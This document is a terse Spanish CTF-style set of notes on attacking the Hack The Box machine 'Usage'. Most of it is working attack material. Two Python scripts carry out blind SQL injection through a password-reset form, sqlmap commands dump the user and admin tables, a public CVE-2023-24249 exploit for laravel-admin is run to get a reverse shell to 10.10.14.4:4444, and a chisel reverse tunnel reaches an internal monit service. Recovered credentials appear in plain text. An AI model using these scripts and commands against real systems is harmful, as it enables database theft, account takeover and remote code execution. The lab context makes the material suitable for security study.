Usage
Sacar nombre de la base de datos:
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, sig_handler)
#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
url= "http://usage.htb/forget-password"
Cookie= {"laravel_session":"eyJpdiI6Ijl4Y1l0cC9WTVZIYjVKUmtPT3dUYlE9PSIsInZhbHVlIjoiTmFtVDNGUHFaM3RQMForVmljd1VRWEM0c29rNGowR2JqV2FSVXdjamY4OEVMWnBlQVI4ZXhVRzlsTFdUeFlaNkdXZnRLUEo4NDRHQlZUNDFOZUlmK2xoRnd2dDM0RUluN1laamdDOW9venVOY3RKa3RSOXRHRlFhMDl2eWtrUjIiLCJtYWMiOiIzYTlhMDBmZWE2ZTBhZGQ1YTRmMmM2NWI5MjdhYjlmNGJiYWU1NDJmMWNlZGRmMGI4ZDhkYjZmZDBjMGU0MWYwIiwidGFnIjoiIn0%3D"}
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
s=requests.session()
s.verify = False
p1= log.progress("Fuerza Bruta")
p1.status("Iniciando proceso de fuerza bruta")
time.sleep(2)
p2= log.progress("Database")
database= ""
for position in range(1,7): #Rango 1 - (tamaño database + 1)
for character in characters:
email= f"' OR ((SUBSTRING(database(),{position},1))='{character}') -- -"
payload = { '_token': "ZQ8Qz5Xb9TUv48tUBrz88JwXlsEpUxLXwxsbMF3n" , 'email':email}
p1.status(email)
#url = quote(url, safe=':/?&=.,')
r = s.post(url,data=payload,allow_redirects=True,cookies=Cookie)
if "password reset link" in r.text :
database += character
p2.status(database)
break
if __name__ == '__main__':
makeSQLI()
Sacar nombres de las tablas
#!/usr/bin/env python3
from pwn import *
import requests, sys, signal, time, pdb, urllib3
from urllib.parse import quote
def sig_handler(sig, frame):
print("\n\n[!] Saliendo...\n")
sys.exit(1)
signal.signal(signal.SIGINT, sig_handler)
#Variables Globales
characters= string.ascii_lowercase + string.ascii_uppercase + string.digits + '_'
url= "http://usage.htb/forget-password"
Cookie= {"laravel_session":"eyJpdiI6IjVXNitkMStleUUxeWp6cGlNN1UwWkE9PSIsInZhbHVlIjoiQVc3b09tOGNubWQwUDZ6b1ZkUWhrTVZVb0NFMyttZ1ZnaVdKWkVib3lETkFGRTRvSHpvWURQWkNoOTg4RFV3bjdUK04xS0JoMUUzUm5TQlBFQ2VrU2Zqd0lHSkxuTldCTnMwQTFWMFNNNmFlZUc1b0J6NUVueWtKWU1TY3NGaW4iLCJtYWMiOiI3YzQ5OGM2MDEyNjc1OTRkNmJlZTViNjdjZWEyYWFiY2RiZTk2NGExN2EzOWI1ZDAyNzZkOGM2MDAwZmFkNmRlIiwidGFnIjoiIn0%3D"}
proxies = {"http": "http://127.0.0.1:8080"}
def makeSQLI():
s=requests.session()
s.verify = False
p1= log.progress("Fuerza Bruta")
p1.status("Iniciando proceso de fuerza bruta")
time.sleep(2)
p2= log.progress("Tables")
table_name= ""
for table in range(1,30):
for position in range(1,15): #Rango 1 - (tamaño database + 1)
for character in characters:
email= f"' OR (substr((select table_name from information_schema.tables where table_schema=database() limit {table},1) ,{position},1)='{character}') -- -) -- -"
payload = { '_token': "ZQ8Qz5Xb9TUv48tUBrz88JwXlsEpUxLXwxsbMF3n" , 'email':email}
p1.status(email)
#url = quote(url, safe=':/?&=.,')
r = s.post(url,data=payload,allow_redirects=True,cookies=Cookie)
if "password reset link" in r.text :
table_name += character
p2.status(table_name)
break
table_name += ", "
if __name__ == '__main__':
makeSQLI()
SQLmap
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog --tables
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T users -C email,password
raj \ xander
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T admin_users --columns
sqlmap -r sqli.req sqli.req -p email --batch --dump --dbms=mysql --level 5 --risk 3 --threads 10 -D usage_blog -T admin_users -C name,password
Administrator \ whatever1
admin \ whatever1
Checkeamos las dependencias de laravel y vemos que es posible que laravel-admin sea vulnerable:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
admin
python3 exploit.py -u http://admin.usage.htb/ -U admin -P whatever1 -i 10.10.14.4 -p 4444
staff \ s3cr3t_c0d3d_1uth
Atacante
chisel server --port 8000 --reverse
Víctima
./chisel client 10.10.14.4:8000 R:2812:127.0.0.1:2812
Atacante accede a http://127.0.0.1:2812
La contraseña de monit está en /home/dash/.monitrc
admin \ 3nc0d3d_pa$w0rd